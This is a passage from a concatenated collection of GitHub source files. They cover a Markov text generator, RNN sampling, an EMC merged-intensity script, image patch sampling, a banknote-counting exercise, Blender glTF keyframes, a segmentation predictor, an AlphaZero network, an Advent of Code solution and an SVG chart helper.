f:\n word = line.split(':')\n text.append(word)\n result_dict = dict(text)\n return result_dict\n\n\ndef predict_text():\n result_dict = read_gram_dict()\n words = []\n for i in result_dict.keys():\n words.append(i)\n word_dict = {}\n for i in range(1, len(words)): # 获得一个二维字典\n if words[i - 1] not in word_dict:\n word_dict[words[i - 1]] = {}\n if words[i] not in word_dict[words[i - 1]]:\n word_dict[words[i - 1]][words[i]] = 0\n word_dict[words[i - 1]][words[i]] += 1\n #print(word_dict)\n length = 100\n chain = ''\n current_word = random.choice(words)\n for i in range(0, length):\n temp = current_word\n current_word = RandomWord(word_dict[current_word])\n cut_word1 = temp.split(' ')[1]\n # chain = chain+temp.split(' ')[0]\n cut_word2 = current_word.split(' ')[0]\n if cut_word1 == cut_word2:\n chain = chain + temp.split(' ')[0]\n temp = current_word\n print(\"随机生成\"+str(length)+\"个词的句子:\"+chain)\n\n\nif __name__ == '__main__':\n # read_dic_two()\n predict_text()\n","repo_name":"nekowu/HFUT_CourseWork","sub_path":"junior_first_term/NLP/shiyan2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36698393493","text":"import mxnet as mx\nfrom mxnet import nd, autograd\nimport numpy as np\n\nctx = mx.cpu(0)\n#ctx = mx.gpu(0)\n\ndef one_hots(numerical_list, vocab_size):\n result = nd.zeros((len(numerical_list), vocab_size), ctx=ctx)\n for i, idx in enumerate(numerical_list):\n result[i, idx] = 1.0\n return result\n\n\ndef textify(embedding,character_list):\n result = \"\"\n indices = nd.argmax(embedding, axis=1).asnumpy()\n for idx in indices:\n result += character_list[int(idx)]\n return result\n\n\ndef softmax(y_linear, temperature=1.0):\n lin = (y_linear-nd.max(y_linear)) / temperature\n exp = nd.exp(lin)\n partition =nd.sum(exp, axis=0, exclude=True).reshape((-1,1))\n return exp / partition\n\n\ndef simple_rnn(inputs, state, params, temperature=1.0):\n [Wxh, Whh, bh, Why, by] = params\n outputs = []\n h = state\n for X in inputs:\n h_linear = nd.dot(X, Wxh) + nd.dot(h, Whh) + bh\n h = nd.tanh(h_linear)\n yhat_linear = nd.dot(h, Why) + by\n yhat = softmax(yhat_linear, temperature=temperature)\n outputs.append(yhat)\n return (outputs, h)\n\n\ndef cross_entropy(yhat, y):\n return - nd.mean(nd.sum(y * nd.log(yhat), axis=0, exclude=True))\n\n\ndef average_ce_loss(outputs, labels):\n assert(len(outputs) == len(labels))\n total_loss = 0.\n for (output, label) in zip(outputs,labels):\n total_loss = total_loss + cross_entropy(output, label)\n return total_loss / len(outputs)\n\n\ndef SGD(params, lr):\n for param in params:\n param[:] = param - lr * param.grad\n\ndef make_dict(character_list):\n character_dict = {}\n for k, word in enumerate(character_list):\n character_dict[word] = k\n return character_dict\n\ndef sample(prefix, num_chars,character_list,num_hidden,params,temperature=1.0):\n\n # Initialize the string that we'll return to the supplied prefix\n string = prefix\n\n # Prepare the prefix as a sequence of one-hots for ingestion by RNN\n vocab_size = len(character_list)\n character_dict = make_dict(character_list)\n prefix_numerical = [character_dict[char] for char in prefix]\n input = one_hots(prefix_numerical,vocab_size)\n\n # Set the initial state of the hidden representation ($h_0$) to the zero vector\n sample_state = nd.zeros(shape=(1, num_hidden), ctx=ctx)\n\n # For num_chars iterations,\n # 1) feed in the current input\n # 2) sample next character from from output distribution\n # 3) add sampled character to the decoded string\n # 4) prepare the sampled character as a one_hot (to be the next input)\n for i in range(num_chars):\n outputs, sample_state = simple_rnn(input, sample_state, params,temperature=temperature)\n choice = np.random.choice(vocab_size, p=outputs[-1][0].asnumpy())\n string += character_list[choice]\n input = one_hots([choice],vocab_size)\n return string","repo_name":"AlexBella365/FrenchTextGenerator","sub_path":"src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18920040776","text":"import argparse\nfrom pathlib import Path\n\nif __name__ == '__main__':\n description = \\\n \"\"\"\n Update merged intensity. \n \"\"\"\n parser = argparse.ArgumentParser(description=description, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-m', '--mpx', type=int, \\\n help=\"linear number of voxels for merged intensities. Default is the value in the last merged intensity pickle file.\")\n parser.add_argument('-q', '--qmax', type=int, \\\n help=\"maximum q-value for determining probabilities. Default is to set qmax equal to the merged intensity value. -1 sets qmax to the data limit. -2 sets qmax to the edge limit.\")\n parser.add_argument('--qmin', type=int, \\\n help=\"minimum q-value for determining probabilities. Default is to set qmin equal to the merged intensity value.\")\n parser.add_argument('--rc', type=int, default=1024, \\\n help=\"number of rotations to simultaneously hold in memory for inner loop.\")\n parser.add_argument('--ic', type=int, default=1024, \\\n help=\"number of rotations to simultaneously hold in memory for inner loop.\")\n parser.add_argument('-P', '--P_file', type=str, default='probability-matrix-merged_intensity.h5', \\\n help=\"probability matrix h5 file contaning logR values to normalise. For multiple files use coma separated list (no spaces)\")\n parser.add_argument('-d', '--data', type=str, default='data.cxi', \\\n help=\"cxi file containing data frames, for geometry.\")\n parser.add_argument('-T', '--data_T', type=str, default='data_T.h5', \\\n help=\"h5 file containing transposed data frames.\")\n parser.add_argument('--merge_I', action='store_true', \\\n help=\"merge tomograms in merged intensity space, this adds P . K in I and P . sum K / sum W in overlap then divides.\")\n parser.add_argument('-o', '--output', type=str, default='merged_intensity.pickle', \\\n help=\"name of output python pickle file. For multiple files an index will be appended.\")\n args = parser.parse_args()\n \n args.dataname = Path(args.data).stem\n\nfrom mpi4py import MPI\n\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\nimport sys\nimport h5py\nimport numpy as np\nimport tqdm\nimport scipy.constants as sc\nimport time\nimport pickle\nimport math\nimport os\n\nimport logR\nfrom emc.tomograms import *\nimport emc.merge_tomos as merge_tomos\n\nimport pyclblast\n\n\nif __name__ == '__main__':\n print('\\n\\n')\n if rank == 0 :\n if args.qmin == None or args.qmax == None or args.mpx == None:\n # get previous merged intensity\n d = pickle.load(open(args.output, 'rb'))\n \n # get q-mask etc.\n # ---------------\n if args.qmin == None :\n args.qmin = d['qmin']\n \n if args.qmax == None :\n args.qmax = d['qmax']\n \n if args.mpx == None :\n args.mpx = d['I'].shape[0]\n \n qmask, q, C, qmin, qmax = logR.get_qmask(args.qmin, args.qmax, args.dataname)\n\n # get rotations from file or recalculate\n # --------------------------------------\n with h5py.File(args.P_file) as f :\n Ndata, Mrot = f['probability_matrix'].shape\n rot_order = f['rotation-order'][()]\n wsums = f['tomogram_sums'][()]\n ksums = f['photon_sums'][()]\n # 2GB limit for mpi \n #P = np.ascontiguousarray(f['probability_matrix'][()].T.astype(np.float32))\n \n R, _ = logR.get_rotations(rot_order)\n \n else :\n qmask = q = C = qmin = qmax = ksums = Ndata = Mrot = rot_order = wsums = R = P = None\n\n qmask = comm.bcast(qmask, root=0)\n q = comm.bcast(q, root=0)\n C = comm.bcast(C, root=0)\n qmin = comm.bcast(qmin, root=0)\n qmax = comm.bcast(qmax, root=0)\n Ndata = comm.bcast(Ndata, root=0)\n Mrot = comm.bcast(Mrot, root=0)\n ksums = comm.bcast(ksums, root=0)\n wsums = comm.bcast(wsums, root=0)\n R = comm.bcast(R, root=0)\n #P = comm.bcast(P, root=0)\n rot_order = comm.bcast(rot_order, root=0)\n args.mpx = comm.bcast(args.mpx, root=0)\n \n #with h5py.File(args.P_file) as f :\n # P = np.ascontiguousarray(f['probability_matrix'][()].T.astype(np.float32))\n \n P_buf = np.empty((args.rc, Ndata), dtype=np.float32)\n \n Ndata = np.int32(Ndata)\n Mrot = np.int32(Mrot)\n Npix = np.int32(np.sum(qmask))\n i0 = np.float32(args.mpx//2)\n M = np.int32(args.mpx)\n\n if (args.mpx % 2) == 0 :\n dq = qmax / (args.mpx / 2 - 1)\n else :\n dq = 2 * qmax / (args.mpx - 1)\n dq = np.float32(dq)\n \n U = math.ceil(Npix/args.ic)\n \n W = np.empty((args.rc, args.ic), dtype = np.float32)\n Wd = np.empty((args.rc, args.ic), dtype = np.float64)\n Ipix = np.empty((args.rc, args.ic), dtype = np.int32)\n K = np.empty((Ndata, args.ic), dtype=np.float32)\n PK = np.empty((args.rc,), dtype=np.float64)\n PK_on_W_r = np.empty((args.rc,), dtype=np.float64)\n\n P_cl = cl.array.empty(queue, (args.rc, Ndata), dtype=np.float32)\n K_cl = cl.array.empty(queue, (Ndata, args.ic), dtype=np.float32)\n W_cl = cl.array.empty(queue, (args.rc, args.ic), dtype = np.float32)\n C_cl = cl.array.empty(queue, (Npix,), dtype = np.float32)\n qx_cl = cl.array.empty(queue, (Npix,), dtype = np.float32)\n qy_cl = cl.array.empty(queue, (Npix,), dtype = np.float32)\n qz_cl = cl.array.empty(queue, (Npix,), dtype = np.float32)\n Ipix_cl = cl.array.empty(queue, (args.rc, args.ic), dtype = np.int32)\n R_cl = cl.array.empty(queue, (9*Mrot,), dtype = np.float32)\n \n cl.enqueue_copy(queue, C_cl.data, np.ascontiguousarray(C[qmask].astype(np.float32)))\n cl.enqueue_copy(queue, R_cl.data, np.ascontiguousarray(R.astype(np.float32)))\n \n cl.enqueue_copy(queue, qx_cl.data, np.ascontiguousarray(q[0][qmask].astype(np.float32)))\n cl.enqueue_copy(queue, qy_cl.data, np.ascontiguousarray(q[1][qmask].astype(np.float32)))\n cl.enqueue_copy(queue, qz_cl.data, np.ascontiguousarray(q[2][qmask].astype(np.float32)))\n \n MT = merge_tomos.Merge_tomos(W.shape, (M, M, M))\n \n load_time = 0\n dot_time = 0\n scale_time = 0\n merge_time = 0\n \n if rank == 0 :\n print('number of rotations :', Mrot)\n print('number of data frames :', Ndata)\n print('number of pixels in q-mask :', Npix)\n \n start_time = time.time()\n \n i_iter = list(range(0, Npix, args.ic))[rank::size]\n \n Rrot = math.ceil(Mrot/args.rc)\n if rank == 0 :\n r_iter = tqdm.tqdm(range(Rrot), desc='generating tomograms')\n else :\n r_iter = range(Rrot)\n\n Kinds = np.arange(qmask.size).reshape(qmask.shape)\n qinds = Kinds[qmask]\n \n for r in r_iter:\n rstart = r*args.rc\n rstop = min(rstart + args.rc, Mrot)\n dr = rstop - rstart\n \n with h5py.File(args.P_file) as f :\n f['probability_matrix_rd'].read_direct(P_buf, np.s_[rstart:rstop, :], np.s_[:dr])\n cl.enqueue_copy(queue, P_cl.data, P_buf)\n \n PK[:dr] = P_buf.dot(ksums)[:dr]\n PK_on_W_r[:dr] = PK[:dr] / wsums[rstart:rstop]\n \n # loop over detector pixels\n for i in i_iter :\n istart = i\n istop = min(i + args.ic, Npix)\n di = istop - istart \n \n # copy data-pixels to gpu\n t0 = time.time()\n with h5py.File(args.data_T) as f:\n if di != args.ic :\n K.fill(0)\n K[:, :di] = f['data_id'][qinds[istart:istop], :].T\n cl.enqueue_copy(queue, K_cl.data, K)\n load_time += time.time() - t0\n \n # calculate dot product (tomograms) W_ri = sum_d P_rd K_di \n t0 = time.time()\n pyclblast.gemm(queue, dr, di, Ndata, P_cl, K_cl, W_cl, a_ld = Ndata, b_ld = args.ic, c_ld = args.ic)\n queue.finish()\n dot_time += time.time() - t0\n \n # scale tomograms w_ri <-- w_ri / (sold + pol. correction C_i)\n t0 = time.time()\n cl_code.scale_tomograms_for_merge_w_coffset( queue, (di,), None,\n W_cl.data, C_cl.data,\n np.int32(args.ic), np.int32(0), np.int32(dr), np.int32(istart))\n queue.finish()\n scale_time += time.time() - t0\n \n \n # calculate tomogram to merged intensity pixel mappings\n t0 = time.time()\n cl_code.calculate_W_to_I_mapping_w_ioffset(queue, (di,), None,\n Ipix_cl.data, R_cl.data, qx_cl.data, qy_cl.data, qz_cl.data, dq, \n i0, np.int32(args.ic), M, np.int32(rstart), np.int32(rstop), np.int32(istart))\n \n # should reduce W and Ipix to rc buffers to cut down on transfer...\n cl.enqueue_copy(queue, W, W_cl.data)\n cl.enqueue_copy(queue, Ipix, Ipix_cl.data)\n \n # merge tomograms Isum[n] += sum_d P_rd K_di[n] / (sold + pol. correction C_i[n])\n # O[n] += sum_d P_rd sum_i K_di / sum_i Wold_ri\n # PK_r / wsums_r\n \n # merge: can I do this on the gpu?\n merge_tomos.queue.finish()\n Wd[:dr] = W[:dr]\n \n MT.merge(Wd, Ipix, 0, dr, PK_on_W_r, di, merge_I = args.merge_I, is_blocking=False)\n merge_time += time.time() - t0\n I, O = MT.get_I_O()\n \n O = comm.reduce(O, op=MPI.SUM, root=0)\n I = comm.reduce(I, op=MPI.SUM, root=0)\n\n if rank == 0 :\n overlap = O.copy()\n Isum = I.copy()\n O[O==0] = 1\n I /= O\n\n pickle.dump({'qmax': qmax, 'qmin': qmin, 'dq': dq, 'I': I, 'Isum': Isum, 'overlap': overlap, 't': 0, 'sample-state': 0, 'data-set': args.data}, open(args.output, 'wb'))\n \n # record merged intensity for each iteration\n pickle.dump(I, open('past-merged_intensities.pickle', 'ab'))\n \n total_time = time.time() - start_time \n print('\\n')\n print('total time: {:.2e}s'.format(total_time))\n print('\\n')\n print('total time seconds')\n print('load time: {:.1e}'.format( load_time))\n print('dot time: {:.1e}'.format( dot_time))\n print('scale time: {:.1e}'.format( scale_time))\n print('merge time: {:.1e}'.format( merge_time))\n print('\\n')\n print('total time %')\n print('load time: {:5.1%}'.format( load_time / total_time))\n print('dot time: {:5.1%}'.format( dot_time / total_time))\n print('scale time: {:5.1%}'.format( scale_time / total_time))\n print('merge time: {:5.1%}'.format( merge_time / total_time))\n print('\\n')\n print(\"These numbers shouldn't change unless things are being done more efficiently:\")\n print('load time / Ndata / Npix : {:.2e}'.format( load_time / Ndata / Npix))\n print('dot time / Ndata / Mrot / Npix : {:.2e}'.format( dot_time / Ndata / Mrot / Npix))\n print('merge time / Mrot / Npix : {:.2e}'.format( 100 * merge_time / Mrot / Npix))\n\n","repo_name":"andyofmelbourne/EMC","sub_path":"emc/update_I.py","file_name":"update_I.py","file_ext":"py","file_size_in_byte":11477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23297074281","text":"# -*- coding: utf-8 -*-\n# @project : Denoise-tensorflow\n# @Time : 2019-08-12 14:35 \n# @Author : ZhangXiao(sinceresky@foxmail.com)\n# @File : patch_util.py\nimport numpy as np\n\n\ndef get_patch_batch(batch_clean, batch_noisy, patch_size, dtype=np.uint8):\n # batch_size = batch_images.shape[0]\n channel = batch_clean.shape[3]\n # x = np.zeros((batch_size, patch_size, patch_size, channel), dtype=dtype)\n # y = np.zeros((batch_size, patch_size, patch_size, channel), dtype=dtype)\n # sample_id = 0\n batch_result_clean = []\n batch_result_noisy = []\n for id in range(len(batch_clean)):\n image_clean = batch_clean[id]\n image_noisy = batch_noisy[id]\n h, w, _ = image_clean.shape\n if h >= patch_size and w >= patch_size:\n i = np.random.randint(h - patch_size + 1)\n j = np.random.randint(w - patch_size + 1)\n image_patch_clean = image_clean[i:i + patch_size, j:j + patch_size]\n image_patch_noisy = image_noisy[i:i + patch_size, j:j + patch_size]\n batch_result_clean.append(image_patch_clean.reshape((patch_size, patch_size, channel)))\n batch_result_noisy.append(image_patch_noisy.reshape((patch_size, patch_size, channel)))\n return np.asarray(batch_result_clean), np.asarray(batch_result_noisy)\n","repo_name":"zhangxiao339/DeNoise-tensorflow","sub_path":"data_util/patch_util.py","file_name":"patch_util.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"26882085767","text":"\"\"\"\r\n\r\nValidación de un número: tiene que ser múltiplo de 10.\r\nimporte:> 33\r\nteclear un número múltiplo de 10\r\nimporte:> 55\r\nteclear un número múltiplo de 10\r\nimporte:> 230\r\n230, ok!\r\n\r\n4 de 50\r\n1 de 20\r\n1 de 10\r\n\"\"\"\r\nnumero = 1\r\nintentos = []\r\nwhile numero % 10 != 0:\r\n cad = input('importe:> ')\r\n if cad.isnumeric():\r\n numero = int(cad)\r\n if numero % 10 != 0:\r\n intentos.append(numero)\r\n print('teclear un número múltiplo de 10')\r\n else:\r\n print('Teclear solo números múltiplo de 10')\r\n intentos.append(cad)\r\n\r\n# El numero es válido \r\nprint(numero,' ok!')\r\nif len(intentos)!=0: \r\n print('Te has confundido: ',len(intentos),'veces', intentos)\r\n\r\ntipos_billetes = [50,20,10]\r\nbilletes = dict()\r\nfor b in tipos_billetes:\r\n if numero >= b:\r\n numBilletes = numero // b\r\n billetes[b] = numBilletes\r\n numero %= b \r\n\r\n if numero == 0: break\r\n\r\n\r\n# Imprimir el resultado:\r\nfor b, cuenta in billetes.items():\r\n print(cuenta,'de',b) \r\n","repo_name":"aldebarran22/python_django","sub_path":"CODIGO/prc_cajero.py","file_name":"prc_cajero.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16510459897","text":"import typing\nimport bpy\nimport mathutils\nfrom ...com import gltf2_blender_math\n\nclass Keyframe:\n def __init__(self, channels: typing.Tuple[bpy.types.FCurve], frame: float, bake_channel: typing.Union[str, None]):\n self.seconds = frame / bpy.context.scene.render.fps\n self.frame = frame\n self.fps = bpy.context.scene.render.fps\n self.__length_morph = 0\n # Note: channels has some None items only for SK if some SK are not animated\n if bake_channel is None:\n self.target = [c for c in channels if c is not None][0].data_path.split('.')[-1]\n if self.target != \"value\":\n self.__indices = [c.array_index for c in channels]\n else:\n self.__indices = [i for i, c in enumerate(channels) if c is not None]\n self.__length_morph = len(channels)\n else:\n if bake_channel == \"value\":\n self.__length_morph = len(channels)\n self.target = bake_channel\n self.__indices = []\n for i in range(self.get_target_len()):\n self.__indices.append(i)\n\n\n # Data holders for virtual properties\n self.__value = None\n self.__in_tangent = None\n self.__out_tangent = None\n\n def get_target_len(self):\n length = {\n \"delta_location\": 3,\n \"delta_rotation_euler\": 3,\n \"delta_rotation_quaternion\": 4,\n \"delta_scale\": 3,\n \"location\": 3,\n \"rotation_axis_angle\": 4,\n \"rotation_euler\": 3,\n \"rotation_quaternion\": 4,\n \"scale\": 3,\n \"value\": self.__length_morph\n }.get(self.target)\n\n if length is None:\n raise RuntimeError(\"Animations with target type '{}' are not supported.\".format(self.target))\n\n return length\n\n def __set_indexed(self, value):\n # Sometimes blender animations only reference a subset of components of a data target. Keyframe should always\n # contain a complete Vector/ Quaternion --> use the array_index value of the keyframe to set components in such\n # structures\n # For SK, must contains all SK values\n result = [0.0] * self.get_target_len()\n for i, v in zip(self.__indices, value):\n result[i] = v\n return result\n\n def get_indices(self):\n return self.__indices\n\n def set_value_index(self, idx, val):\n self.__value[idx] = val\n\n def set_value_index_in(self, idx, val):\n self.__in_tangent[idx] = val\n\n def set_value_index_out(self, idx, val):\n self.__out_tangent[idx] = val\n\n def set_first_tangent(self):\n self.__in_tangent = self.__value\n\n def set_last_tangent(self):\n self.__out_tangent = self.__value\n\n @property\n def value(self) -> typing.Union[mathutils.Vector, mathutils.Euler, mathutils.Quaternion, typing.List[float]]:\n if self.target == \"value\":\n return self.__value\n return gltf2_blender_math.list_to_mathutils(self.__value, self.target)\n\n @value.setter\n def value(self, value: typing.List[float]):\n self.__value = self.__set_indexed(value)\n\n @value.setter\n def value_total(self, value: typing.List[float]):\n self.__value = value\n\n @property\n def in_tangent(self) -> typing.Union[mathutils.Vector, mathutils.Euler, mathutils.Quaternion, typing.List[float]]:\n if self.__in_tangent is None:\n return None\n if self.target == \"value\":\n return self.__in_tangent\n return gltf2_blender_math.list_to_mathutils(self.__in_tangent, self.target)\n\n @in_tangent.setter\n def in_tangent(self, value: typing.List[float]):\n self.__in_tangent = self.__set_indexed(value)\n\n @property\n def out_tangent(self) -> typing.Union[mathutils.Vector, mathutils.Euler, mathutils.Quaternion, typing.List[float]]:\n if self.__out_tangent is None:\n return None\n if self.target == \"value\":\n return self.__out_tangent\n return gltf2_blender_math.list_to_mathutils(self.__out_tangent, self.target)\n\n @out_tangent.setter\n def out_tangent(self, value: typing.List[float]):\n self.__out_tangent = self.__set_indexed(value)\n","repo_name":"KhronosGroup/glTF-Blender-IO","sub_path":"addons/io_scene_gltf2/blender/exp/animation/gltf2_blender_gather_keyframes.py","file_name":"gltf2_blender_gather_keyframes.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":1363,"dataset":"github-code","pt":"48"} +{"seq_id":"39101502305","text":"import numpy as np\nimport torch\nfrom PIL import Image\nfrom transformers import AutoImageProcessor\n\nfrom models.mobilevit import MobileVIT\n\n# Checkpoint of the model used in the projec\nMODEL_CHECKPOINT = \"mmenendezg/mobilevit-fluorescent-neuronal-cells\"\n\n# Define the accelerator\nif torch.backends.mps.is_available():\n DEVICE = torch.device(\"mps:0\")\n ACCELERATOR = \"mps\"\nelif torch.cuda.is_available():\n DEVICE = torch.device(\"cuda\")\n ACCELERATOR = \"gpu\"\nelse:\n DEVICE = torch.device(\"cpu\")\n ACCELERATOR = \"cpu\"\n\n\ndef single_prediction(image):\n # Instantiate the model from the checkpoint and using the hparams file\n mobilevit_model = MobileVIT()\n mobilevit_model.to(DEVICE)\n # Instantiate the image_processor\n image_processor = AutoImageProcessor.from_pretrained(\n MODEL_CHECKPOINT, do_reduce_labels=False\n )\n # Load the image\n image = image.convert(\"RGB\")\n # Convert the image to numpy array\n np_image = np.asarray(image, dtype=np.uint8)\n # Preprocess the image and move the image to the GPU Device\n processed_image = image_processor(images=np_image, return_tensors=\"pt\")\n processed_image.to(DEVICE)\n # Make the prediction and resize the predicted mask\n logits = mobilevit_model.model(pixel_values=processed_image[\"pixel_values\"])\n post_processed_image = image_processor.post_process_semantic_segmentation(\n outputs=logits, target_sizes=[(np_image.shape[0], np_image.shape[1])]\n )\n # Process the mask\n mask = post_processed_image[0].data.cpu().numpy().astype(np.uint8) * 255\n mask = Image.fromarray(mask)\n\n return mask\n","repo_name":"mmenendezg/mobilevit-fluorescent-cells","sub_path":"src/tools/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42377169022","text":"import torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\n\nfrom self_play_dataset import SelfPlayDataset\nBOARD_SIZE = 9\n\nclass BasicBlock(nn.Module):\n def __init__(self, in_channels, out_channels):\n super().__init__()\n self.conv1 = nn.Conv2d(in_channels,\n out_channels,\n kernel_size=3,\n stride=1,\n padding=1)\n nn.init.kaiming_normal_(self.conv1.weight,\n mode=\"fan_out\",\n nonlinearity=\"relu\")\n self.bn1 = nn.BatchNorm2d(num_features=out_channels)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(in_channels=out_channels,\n out_channels=out_channels,\n kernel_size=3,\n stride=1,\n padding=1)\n nn.init.kaiming_normal_(self.conv2.weight,\n mode=\"fan_out\",\n nonlinearity=\"relu\")\n self.bn2 = nn.BatchNorm2d(num_features=out_channels)\n self.relu2 = nn.ReLU()\n\n def forward(self, x):\n y = self.conv1(x)\n y = self.bn1(y)\n y = self.relu1(y)\n y = self.conv2(y)\n y = self.bn2(y)\n x = x + y\n x = self.relu2(x)\n return x\n\n\nclass ResNet(nn.Module):\n def __init__(self, in_channels, blocks, out_channels):\n super().__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels,\n out_channels,\n kernel_size=3,\n stride=1,\n padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(),\n )\n self.convs = nn.ModuleList([\n BasicBlock(in_channels=out_channels,\n out_channels=out_channels) for _ in range(blocks)\n ])\n\n def forward(self, x):\n x = self.conv1(x)\n for conv in self.convs:\n x = conv(x)\n return x\n\n\nclass AlphaZeroNet(nn.Module):\n def __init__(self,):\n super().__init__()\n # channels, height, width\n self.observation_tensor_shape = (10, BOARD_SIZE, BOARD_SIZE)\n in_channels, height, width = self.observation_tensor_shape\n channels = 32\n blocks = 10\n self.backbone = ResNet(in_channels, blocks, channels)\n\n # policy head\n self.policy_head_front = nn.Sequential(\n nn.Conv2d(in_channels=channels,\n out_channels=2,\n kernel_size=1),\n nn.BatchNorm2d(num_features=2),\n nn.ReLU(),\n )\n\n self.policy_head_end = nn.Sequential(\n nn.Linear(in_features=2 * height * width,\n out_features=BOARD_SIZE**2),\n nn.Softmax(dim=1)\n )\n\n # value head\n self.value_head_front = nn.Sequential(\n nn.Conv2d(in_channels=channels,\n out_channels=1,\n kernel_size=1),\n nn.BatchNorm2d(num_features=1),\n nn.ReLU(),\n )\n\n self.value_head_end = nn.Sequential(\n nn.Linear(in_features=height * width,\n out_features=channels),\n nn.ReLU(),\n nn.Linear(in_features=channels,\n out_features=1),\n nn.Tanh()\n )\n\n def forward(self, x):\n _, height, width = self.observation_tensor_shape\n x = self.backbone(x)\n # policy head\n p = self.policy_head_front(x)\n p = p.view(-1, 2 * height * width)\n p = self.policy_head_end(p) \n # value head\n v = self.value_head_front(x)\n v = v.view(-1, height * width)\n v = self.value_head_end(v)\n return p, v\n\nif __name__ == '__main__':\n net = AlphaZeroNet()\n dataset = SelfPlayDataset(capacity=1000, device='cpu')\n dataset.load('./sgf/iteration_001')\n dataloader = DataLoader(dataset=dataset, batch_size=16, shuffle=False)\n optimizer = torch.optim.Adam(net.parameters(), lr=0.01, weight_decay=1e-4)\n\n policy_criterion = nn.CrossEntropyLoss()\n value_criterion = nn.MSELoss()\n for features, policy_labels, value_labels in dataloader:\n # features = features.to(device)\n # policy_labels = policy_labels.to(device)\n # value_labels = value_labels.to(device)\n policy_logits, value_logits = net(features)\n # print(policy_logits.shape, policy_labels.shape)\n policy_loss = policy_criterion(policy_logits, policy_labels)\n # print(value_logits.shape, value_labels.shape)\n value_loss = value_criterion(value_logits.squeeze(), value_labels)\n print('\\tpolicy_loss:', policy_loss.item())\n print('\\tvalue_loss:', value_loss.item())\n loss = policy_loss + value_loss\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n torch.save(net, 'test3.pt')\n","repo_name":"Jerry-Github-Cloud/TCG_Project5-AlphaZero","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37037217678","text":"def get_polymer(filename):\n with open(filename) as f:\n polymer = f.read()\n polymer = polymer.replace('\\n','')\n return(polymer)\n\ndef stack_redcution(polymer):\n stack = []\n for c in polymer:\n if stack and stack[-1] == c.swapcase():\n stack.pop()\n else:\n stack.append(c)\n new_polymer = ''.join(stack)\n return(new_polymer)\n\ndef part1(filename):\n polymer = get_polymer(filename)\n print('Part 1 Answer:', len(stack_redcution(polymer)))\n\ndef part2(filename):\n polymer = get_polymer(filename)\n from string import ascii_lowercase\n shortest = min([len(stack_redcution(polymer.replace(c,'').replace(c.upper(),''))) for c in ascii_lowercase])\n print('Part 2 Answer:', shortest)\n\ninput_file = '2018/inputs/2018_05_input.txt'\npart1(input_file)\npart2(input_file)\n","repo_name":"MattMichaud/AoC","sub_path":"2018/2018_05.py","file_name":"2018_05.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72236853587","text":"#!/usr/bin/python\nfrom __future__ import division\nimport copy\nimport fileio\nimport unittest\n\n\ndef round_point(point):\n return [int(point[0]), int(point[1])]\n\n\ndef scale_point(point, k):\n return [k[0]*point[0], k[1]*point[1]]\n\n\ndef shift_point(point, offset):\n return [point[0]+offset[0], point[1]+offset[1]]\n\n\ndef round_points(points):\n return [round_point(p) for p in points]\n\n\ndef scale_points(points, k):\n return [scale_point(p, k) for p in points]\n\n\ndef shift_points(points, offset):\n return [shift_point(p, offset) for p in points]\n\n\ndef get_square():\n return [[0, 0], [1, 0], [1, 1], [0, 1], [0, 0]]\n\n\ndef get_rectangular(w, h):\n return scale_points(get_square(), [w, h])\n\n\ndef get_color(text):\n t = {\n 'white': '#fff',\n 'black': '#000',\n 'red': '#f00',\n 'green': '#0f0',\n 'blue': '#00f'\n }\n return t.get(text, text)\n\n\ndef close_points(points):\n res = points[:]\n if len(res) < 1:\n return res\n first = res[0]\n last = res[-1]\n res.append([last[0], 0])\n res.append([first[0], 0])\n res.append(first)\n return res\n\n\nclass BoundingBox:\n\n def __init__(self, point=None):\n self.left_bottom = None\n self.right_top = None\n self.include(point)\n\n def include(self, point):\n if self.left_bottom is None or self.right_top is None:\n self.left_bottom = point[:]\n self.right_top = point[:]\n return\n\n self.left_bottom[0] = min(self.left_bottom[0], point[0])\n self.left_bottom[1] = min(self.left_bottom[1], point[1])\n self.right_top[0] = max(self.right_top[0], point[0])\n self.right_top[1] = max(self.right_top[1], point[1])\n\n def width(self):\n return self.right_top[0] - self.left_bottom[0]\n\n def height(self):\n return self.right_top[1] - self.left_bottom[1]\n\n\nclass Chart:\n\n def __init__(self, width=650, height=75,\n padding_top=10, padding_bottom=20,\n padding_left=20, padding_right=40,\n inverseX=False,\n xlabels=[], ylabels=[]):\n self.width = width\n self.height = height\n self.padding_top = padding_top\n self.padding_bottom = padding_bottom\n self.padding_left = padding_left\n self.padding_right = padding_right\n self.inverseX = inverseX\n self.traces = []\n self.texts = []\n self.canvas = BoundingBox([0, 0])\n self.xlabels = xlabels\n self.ylabels = ylabels\n self.is_axes_on_top = False\n\n # self.add_frame() # TODO: remove\n self.add_background()\n self.add_labels()\n self.add_axes()\n\n def set_minimal_canvas(self, point1, point2):\n self.canvas.include(point1)\n self.canvas.include(point2)\n\n def add_frame(self):\n points = get_rectangular(self.width-2, self.height-2)\n points = shift_points(points, [1, 1])\n data = 